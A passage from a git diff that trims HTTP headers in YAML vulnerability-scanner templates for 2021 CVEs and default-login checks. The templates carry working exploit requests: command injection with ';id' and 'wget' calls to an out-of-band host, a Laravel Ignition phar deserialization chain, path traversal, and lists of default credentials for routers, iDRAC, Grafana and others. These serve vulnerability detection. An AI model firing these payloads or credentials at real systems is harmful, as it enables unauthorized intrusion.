text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + - | GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 extractors: - type: regex diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index cc21b4ced3..b16d0b19a0 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -4,8 +4,7 @@ info: name: Hongdian Sensitive Information author: gy741 severity: medium - description: | - Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 @@ -16,26 +15,12 @@ requests: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 0b2c9fed15..34b2b86083 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -16,36 +16,18 @@ requests: - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 0ad974afd4..46e6805abe 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -14,21 +14,15 @@ requests: - | PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en Accept: */* - Content-Length: 23 Content-Type: application/json - Connection: close {"Password":"{{randstr}}"} - | POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Content-Length: 50 Content-Type: application/json - Connection: close {"UserName":"Administrator","Password":"{{randstr}}"} diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 98d90910a3..6de9e167ab 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -14,11 +14,7 @@ requests: POST /index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 6e406ccb7c..8a0135ebcb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -15,10 +15,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -26,10 +23,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -37,10 +31,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} @@ -48,10 +39,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} @@ -59,10 +47,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -70,10 +55,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 18d299007e..71be85cd28 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -15,12 +15,8 @@ requests: - | POST /goform/setmac HTTP/1.1 Host: {{Hostname}} - Connection: close - Accept-Encoding: gzip, deflate - Accept: */* - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/index.htmlr - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/index.htmlr Content-Type: application/x-www-form-urlencoded module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index b0db1c2b47..47b367c664 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -14,7 +14,6 @@ requests: GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 Host: {{Hostname}} User-Agent: asusrouter-- - Connection: close Referer: {{BaseURL}} Cookie: asus_token=\0Invalid; clickedItem_tab=0 diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 383ea4d3fe..ae2f69e33a 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -14,10 +14,6 @@ requests: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: language=en; login=1 matchers-condition: and diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 9de55d3241..0d381d2581 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -15,9 +15,6 @@ requests: GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Cache-Control: max-age=0 - Connection: keep-alive matchers: - type: word diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 78e663ef7f..726f1cffae 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -16,13 +16,11 @@ requests: GET /%u002e/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - |+ GET /.%00/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) unsafe: true diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 8e59a60f28..9a97a4f4e5 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -12,13 +12,10 @@ requests: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" @@ -77,13 +74,10 @@ requests: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 221dabdf34..6fdac1d2be 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -10,16 +10,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login -# admin:password - requests: - method: GET path: - '{{BaseURL}}/api/get_device_details' headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Referer: '{{BaseURL}}/assets/base/home.html' Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' + # admin:password matchers-condition: and matchers: diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 1f3cfe52ce..6852d161cb 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -14,36 +14,24 @@ requests: - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"admin","password":"cs141-snmp"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"engineer","password":"engineer"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"guest","password":"guest"} diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6b23e91841..bb68f1a710 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -11,15 +11,9 @@ requests: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/plain, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Content-Length: 67 Origin: {{BaseURL}} Referer: {{BaseURL}}/libs/granite/core/content/login.html - Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml index 50bcb9d651..c53dac75ff 100644 --- a/default-logins/apache/airflow-default-credentials.yaml +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -13,22 +13,13 @@ requests: GET /admin/airflow/login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /admin/airflow/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close username=airflow&password=airflow&_csrf_token={{csrf_token}} diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index 58bc528ac9..e5ff9cb506 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -13,22 +13,13 @@ requests: GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close csrf_token={{csrff_token}}&username=admin&password=admin diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index d4e68fe296..95bc7ea11b 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -7,15 +7,16 @@ info: requests: - method: POST - cookie-reuse: true path: - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" + headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 - Content-Type: application/x-www-form-urlencode + Content-Type: "application/x-www-form-urlencode" Referer: "{{BaseURL}}/login.html" + cookie-reuse: true matchers-condition: and matchers: - type: status @@ -24,4 +25,4 @@ requests: - type: word words: - - 0 + - '0' diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 78d78f3130..8c71a04c75 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -11,14 +11,8 @@ requests: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate User: "root" Password: "calvin" - Content-Length: 0 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 225cbfa45e..20db518552 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -11,13 +11,8 @@ requests: - | POST /login/dologin HTTP/1.1 Host: {{Hostname}} - Content-Length: 35 Accept: */* - X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: closen user_name=admin&user_password=admin diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 496b30ecbc..7f40fcc2de 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -13,12 +13,9 @@ requests: - | POST /oauth/token HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 800d8aef3a..4af21aa850 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -12,27 +12,13 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Upgrade-Insecure-Requests: 1 - Connection: keep-alive - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} - Connection: keep-alive - Content-Length: 179 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index b8adcda88b..8af859b590 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -9,20 +9,15 @@ info: - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 -# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. -# So make sure, not to attempt more than 4 password for same valid user. - requests: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"user":"admin","password":"§grafana_password§"} diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-password.yaml index 6558607526..f6098d34fa 100644 --- a/default-logins/hongdian/hongdian-default-password.yaml +++ b/default-logins/hongdian/hongdian-default-password.yaml @@ -11,26 +11,16 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 05ebbcc3c5..25d1a2fc6b 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -11,10 +11,8 @@ requests: - | POST /0/Authenticate HTTP/1.1 Host: {{Hostname}} - Origin: http://{{Hostname}} - Content-Length: 62 + Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Connection: close j_username=admin&j_password=admin&continue=&submit=submit+form diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index 9924878032..da94fcec13 100644 --- 